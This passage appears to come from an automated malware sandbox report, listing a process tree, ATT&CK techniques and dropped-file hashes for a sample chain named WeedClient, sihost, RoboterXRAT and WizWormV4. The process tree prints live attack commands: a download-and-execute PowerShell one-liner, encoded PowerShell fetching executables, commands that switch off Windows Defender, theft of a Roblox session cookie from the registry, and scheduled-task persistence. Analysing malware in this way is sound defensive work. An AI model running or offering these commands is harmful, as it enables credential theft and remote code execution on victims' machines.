pADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        10⤵
        
        PID:4528
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3164
        
        C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"
        12⤵
        Executes dropped EXE
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"
        12⤵
        
        PID:6040
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        8⤵
        
        PID:5952
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5432
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp214.tmp.bat""
        8⤵
        
        PID:1664
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        9⤵
        Delays execution with timeout.exe
        
        PID:5772
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        9⤵
        Executes dropped EXE
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        7⤵
        Executes dropped EXE
        
        PID:4404
      - C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3288
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        7⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5912
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3896
        
        C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5264
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcnetwork" /tr "%Current%\wzcnetwork.exe"
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3684
        
        C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"
        11⤵
        Executes dropped EXE
        
        PID:1812
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        7⤵
        
        PID:2684
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5316
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF61E.tmp.bat""
        7⤵
        
        PID:5420
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5452
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:5816
      - C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        6⤵
        Executes dropped EXE
        
        PID:4412
    - - C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4836
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        6⤵
        
        PID:4788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        7⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        8⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:5416
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        6⤵
        
        PID:4316
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2680
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEDD1.tmp.bat""
        6⤵
        
        PID:4404
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:5244
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        7⤵
        Executes dropped EXE
        
        PID:1744
    - - C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3000
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3056
      - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        6⤵
        Views/modifies file attributes
        
        PID:2476
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1844
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:408
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1788
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2408
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6084
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        6⤵
        
        PID:5776
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        6⤵
        
        PID:5176
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:5248
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        
        PID:5200
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:5292
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        6⤵
        
        PID:4540
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5820
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        7⤵
        Runs ping.exe
        
        PID:4728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3672

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3844

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4032

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2568

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4100

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1648

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4672

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2532

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3388

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3748

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:1240

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3168

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:2204

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:3792

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:916

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4844

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:3860

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Enumerates system info in registry
PID:2420

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5608

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:1936

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:548

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5352

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RoboterXRAT V5.exe.log

Filesize
42B

MD5
84cfdb4b995b1dbf543b26b86c863adc

SHA1
d2f47764908bf30036cf8248b9ff5541e2711fa2

SHA256
d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

SHA512
485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WizWormV4.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sihost.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WeedClient.exe.log

Filesize
522B

MD5
acc9090417037dfa2a55b46ed86e32b8

SHA1
53fa6fb25fb3e88c24d2027aca6ae492b2800a4d

SHA256
2412679218bb0a7d05ceee32869bbb223619bde9966c4c460a68304a3367724b

SHA512
d51f7085ec147c708f446b9fb6923cd2fb64596d354ed929e125b30ace57c8cb3217589447a36960e5d3aea87a4e48aaa82c7509eced6d6c2cecd71fcfe3697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1231d50ec772ab4483c5f28579fa9d6b

SHA1
e163fdbd1bfc9a60714d5cef5a6268373ab9b675

SHA256
630a9c85af404fcc45705190bcc96bf10f072353b0b14c9df1da91cac7d2d24b

SHA512
473fa4f24b4efd083c5c3aef6df7f11bb20015fffb1b3893cca523e47b9d0c7480d1873208b29d3f85f949c747abb92618336a3b21fb58ea7b0af6d096563c68

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6fdf0e3c24349ba3e44163735c029f39

SHA1
f18f0f2839c956d2702783138b28e69cf2104273

SHA256
98cccf7e7b441a870f8a92b36d4f05f886ad6695d3605d7104891952a2a0a67a

SHA512
26dc0ba587b4e7eee377d33e92aec9c99687bf5a605f99ceb609cd94ce38c2603686649e8c64fa61405775a5a475095a6438d70990a3b9ee81a15917d9299aad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
